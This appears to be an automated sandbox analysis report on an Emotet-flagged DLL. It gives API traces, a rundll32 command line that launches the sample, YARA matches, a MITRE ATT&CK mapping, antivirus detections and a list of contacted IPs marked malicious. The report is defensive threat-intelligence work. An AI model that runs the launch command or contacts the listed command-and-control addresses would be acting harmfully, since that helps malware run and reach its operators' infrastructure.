Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10021743
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_100167D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,	2_2_1001FC21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,	2_2_1001FC43
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001C49A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1001C49A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_10021743 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_10021743
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100167D5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_100167D5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001FC21 SetUnhandledExceptionFilter,__encode_pointer,	3_2_1001FC21
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_1001FC43 __decode_pointer,SetUnhandledExceptionFilter,	3_2_1001FC43

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 69.16.218.101 144			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.138.98.34 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	2_2_10027704
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	2_2_1000A803
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	2_2_10023880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	3_2_10027704
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,	3_2_1000A803
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	3_2_10023880

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_10022853 cpuid

2_2_10022853

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_1001F914 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

2_2_1001F914

Source: C:\Windows\SysWOW64\regsvr32.exe

2_2_100178B6

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 4.2.rundll32.exe.5280000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5110000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4690000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.47c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4820000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4060000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4820000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4060000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.52b0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.47f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4690000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5410000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4c00000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.2a80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.47c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4b30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5220000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.4850000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5250000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5280000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.53e0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.46c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.4c70000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.51f0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.51c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.2a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.4b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5110000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.2ad0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5140000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.51c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.53e0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.5220000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.regsvr32.exe.3230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.4a40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.353899484.00000000047F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354941726.0000000005411000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.354039628.0000000004851000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353678279.00000000046C1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354572676.0000000005220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.397064444.0000000002A80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354868089.00000000053E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354398198.00000000051C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354782751.00000000052B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353971003.0000000004820000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354142339.0000000005110000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353601392.0000000004690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.397100803.0000000002AD1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.350955081.0000000004A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353804496.00000000047C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354700642.0000000005280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354625308.0000000005251000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354494384.00000000051F1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.352946917.0000000004060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.354257894.0000000005141000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353590253.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.396217963.0000000003230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		2_2_100011C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_100011C0 WSAStartup,_memset,htonl,htons,socket,bind,setsockopt,		3_2_100011C0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	DLL Side-Loading1	Process Injection111	Masquerading2	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion3	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection111	Security Account Manager	Security Software Discovery41	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Ingress Tool Transfer1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Virtualization/Sandbox Evasion3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Regsvr321	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	System Information Discovery45	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	DLL Side-Loading1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	File Deletion1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
CSxylfUJcL.dll	21%	Virustotal		Browse
CSxylfUJcL.dll	33%	ReversingLabs	Win32.Trojan.Emotet
CSxylfUJcL.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.2.rundll32.exe.4850000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.53e0000.10.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.5280000.8.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4060000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.4b30000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
3.2.rundll32.exe.4a40000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.5410000.11.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.4690000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
2.2.regsvr32.exe.3230000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4190000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.47c0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
5.2.rundll32.exe.4820000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.52b0000.9.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.47f0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.4c00000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.5250000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.2.rundll32.exe.46c0000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.4c70000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.51f0000.5.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
6.2.rundll32.exe.2ad0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.51c0000.4.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
2.2.regsvr32.exe.4b80000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.5110000.2.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
6.2.rundll32.exe.2a80000.0.unpack	100%	Avira	HEUR/AGEN.1145233	Download File
4.2.rundll32.exe.5140000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
4.2.rundll32.exe.5220000.6.unpack	100%	Avira	HEUR/AGEN.1145233	Download File

Domains

Source	Detection	Scanner	Label	Link
windowsupdate.s.llnwi.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://www.disneyplus.com/legal/your-california-privacy-rights	0%	URL Reputation	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://www.disneyplus.com/legal/privacy-policy	0%	URL Reputation	safe
https://www.tiktok.com/legal/report/feedback	0%	URL Reputation	safe
http://help.disneyplus.com.	0%	URL Reputation	safe
http://crl.globals	0%	Avira URL Cloud	safe
https://disneyplus.com/legal.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
windowsupdate.s.llnwi.net	41.63.96.128	true	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.disneyplus.com/legal/your-california-privacy-rights	svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 00000015.00000002.501039542.000002DCEF4EA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.863099825.000001B96A013000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://www.disneyplus.com/legal/privacy-policy	svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.tiktok.com/legal/report/feedback	svchost.exe, 00000015.00000003.481145725.000002DCEFD82000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481291827.000002DCF0202000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481239356.000002DCEFDA4000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481311470.000002DCEFD82000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.481252613.000002DCF0219000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://help.disneyplus.com.	svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.globals	rundll32.exe, 0000000C.00000003.461140176.0000000004DBF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://disneyplus.com/legal.	svchost.exe, 00000015.00000003.480197283.000002DCEFD92000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
207.148.81.119	unknown	United States	20473	AS-CHOOPAUS	true
104.131.62.48	unknown	United States	14061	DIGITALOCEAN-ASNUS	true
85.214.67.203	unknown	Germany	6724	STRATOSTRATOAGDE	true
191.252.103.16	unknown	Brazil	27715	LocawebServicosdeInternetSABR	true
168.197.250.14	unknown	Argentina	264776	OmarAnselmoRipollTDCNETAR	true
66.42.57.149	unknown	United States	20473	AS-CHOOPAUS	true
185.148.168.15	unknown	Germany	44780	EVERSCALE-ASDE	true
51.210.242.234	unknown	France	16276	OVHFR	true
217.182.143.207	unknown	France	16276	OVHFR	true
69.16.218.101	unknown	United States	32244	LIQUIDWEBUS	true
159.69.237.188	unknown	Germany	24940	HETZNER-ASDE	true
45.138.98.34	unknown	Germany	9009	M247GB	true
116.124.128.206	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
78.46.73.125	unknown	Germany	24940	HETZNER-ASDE	true
37.59.209.141	unknown	France	16276	OVHFR	true
210.57.209.142	unknown	Indonesia	38142	UNAIR-AS-IDUniversitasAirlanggaID	true
185.148.168.220	unknown	Germany	44780	EVERSCALE-ASDE	true
54.37.228.122	unknown	France	16276	OVHFR	true
190.90.233.66	unknown	Colombia	18678	INTERNEXASAESPCO	true
142.4.219.173	unknown	Canada	16276	OVHFR	true
54.38.242.185	unknown	France	16276	OVHFR	true
195.154.146.35	unknown	France	12876	OnlineSASFR	true
195.77.239.39	unknown	Spain	60493	FICOSA-ASES	true
78.47.204.80	unknown	Germany	24940	HETZNER-ASDE	true
37.44.244.177	unknown	Germany	47583	AS-HOSTINGERLT	true
62.171.178.147	unknown	United Kingdom	51167	CONTABODE	true
128.199.192.135	unknown	United Kingdom	14061	DIGITALOCEAN-ASNUS	true

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553113
Start date:	14.01.2022
Start time:	10:36:05
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CSxylfUJcL (renamed file extension from none to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@22/7@0/29
EGA Information:	Successful, ratio: 80%
HDC Information:	Successful, ratio: 32.6% (good quality ratio 31.7%) Quality average: 81.1% Quality standard deviation: 23.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 43 Number of non-executed functions: 216
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 173.222.108.226, 173.222.108.210, 8.248.145.254, 8.248.137.254, 8.241.126.249, 8.253.190.120, 67.26.115.254, 20.54.110.249, 23.211.4.86 Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, dual-a-0001.dc-msedge.net, a-0001.a-afdentry.net.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:38:06	API Interceptor	10x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
207.148.81.119	vHwdqVl8yP.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse
	qJQ5zHpsbm.dll	Get hash	malicious	Browse
	EtUNsUHRzq.dll	Get hash	malicious	Browse
	PyqpE3VUI3.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	TkXWcfci7G.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsm	Get hash	malicious	Browse
	GxRg3MtYpO.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.9674.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.20696.xlsm	Get hash	malicious	Browse
	qyqbwh33325851.xlsm	Get hash	malicious	Browse
104.131.62.48	vHwdqVl8yP.dll	Get hash	malicious	Browse
	wg1bXKYOOs.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.37.xlsm	Get hash	malicious	Browse
	qJQ5zHpsbm.dll	Get hash	malicious	Browse
	EtUNsUHRzq.dll	Get hash	malicious	Browse
	PyqpE3VUI3.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.31437.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse
	P6h9ZprN2X.dll	Get hash	malicious	Browse
	TkXWcfci7G.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.29393.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.18721.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.3593.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.5957.xlsm	Get hash	malicious	Browse
	GxRg3MtYpO.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.9674.xlsm	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Agent.FRJZ.20696.xlsm	Get hash	malicious	Browse
	qyqbwh33325851.xlsm	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
windowsupdate.s.llnwi.net	vHwdqVl8yP.dll	Get hash	malicious	Browse	95.140.236.0
	wg1bXKYOOs.dll	Get hash	malicious	Browse	41.63.96.128
	SecuriteInfo.com.Trojan.Agent.FRJZ.15200.xlsm	Get hash	malicious	Browse	178.79.242.0
	SecuriteInfo.com.Trojan.Agent.FRJZ.4911.xlsm	Get hash	malicious	Browse	95.140.236.128
	SecuriteInfo.com.Trojan.Agent.FRJZ.9674.xlsm	Get hash	malicious	Browse	95.140.236.128
	SecuriteInfo.com.Trojan.Agent.FRJZ.20696.xlsm	Get hash	malicious	Browse	178.79.242.0
	qyqbwh33325851.xlsm	Get hash	malicious	Browse	95.140.230.192
	Vogxx6aXgA.dll	Get hash	malicious	Browse	95.140.236.0
	K337Ax5xIs.dll	Get hash	malicious	Browse	41.63.96.128
